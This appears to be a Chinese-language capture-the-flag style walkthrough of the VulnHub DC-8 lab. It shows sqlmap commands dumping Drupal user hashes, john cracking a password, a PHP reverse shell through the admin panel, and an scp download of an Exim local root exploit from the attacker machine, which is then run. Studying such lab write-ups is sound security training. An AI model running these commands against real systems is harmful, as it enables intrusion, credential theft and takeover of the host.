vulnhub之DC-8靶机渗透详细过程
2022-1-28 22:13:47 Author: www.freebuf.com(查看原文) 阅读量:7 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

使用nmap扫描C段发现靶机ip

nmap 192.168.26.0/24

发现靶机ip为 192.168.26.136 本次使用kali2020,kali IP为192.168.26.20

使用nmap扫描靶机具体信息

nmap -sS -sV -T4 -A -p- 192.168.26.136

也没发现什么有用的信息,然后访问80端口,看到这个页面有参数顺手加了个单引号发现报错了,接着测试发现有sql注入漏洞

图片.png

图片.png

然后就sqlmap一把梭

sqlmap -u http://192.168.26.136/?nid=0%27 --dbs

图片.png

sqlmap -u http://192.168.26.136/?nid=0%27 -D d7db  --tables

图片.png

sqlmap -u http://192.168.26.136/?nid=0%27 -D d7db  -T users --columns

图片.png

sqlmap -u http://192.168.26.136/?nid=0%27 -D d7db -T users -C "uid,name,pass" --dump

图片.png

然后复制密码,拿给john尝试解密,只把john的密码解密了出来

john 123.txt  --format=Drupal7        #这里123.txt里是john用户的密码(加密后的)

图片.png

拿着账号:john 密码:turtle 去登录,在后台的form settings 发现了可以上传php代码,于是尝试反弹shell

图片.png

编辑完即可得到反弹的shell

图片.png

得到shell后用下面的命令查看,发现exim 有suid权限,然后去看了以下exim的版本,通过searchsploit 搜到了该版本的exim有本地提权漏洞于是开始利用有suid权限的exim来提权

python -c 'import pty;pty.spawn("/bin/bash")'       #优化终端显示
find / -user root -perm -4000 -print 2>/dev/null      #用于发现有suid权限的命令和程序
exim --version
earchsploit exim 4

图片.png

图片.png

先开启kali的ssh服务

图片.png

图片.png

sshf启动

    开启:/etc/init.d/ssh start

    重启:/etc/init.d/ssh restart

    关闭:/etc/init.d/ssh stop

    状态:/etc/init.d/ssh status

图片.png

然后用靶机连接kali利用ssh将 exp下载到靶机上来

scp [email protected]:/usr/share/exploitdb/exploits/linux/local/46996.sh /tmp/

图片.png

chmod 777 46996.sh          #赋权
sed -i "s/\r//" 46996.sh    #(2)使用sed命令sed -i "s/\r//" filename或者sed -i "s/^M//" filename直接替换结尾符为unix格式,防止脚本因为格式问题运行不了。
./46996.sh -m netcat        #根据exp的提示,执行该脚本

然后就会获取到root权限,进root目录即可读取到flag

图片.png


文章来源: https://www.freebuf.com/articles/web/321142.html
如有侵权请联系:admin#unsafe.sh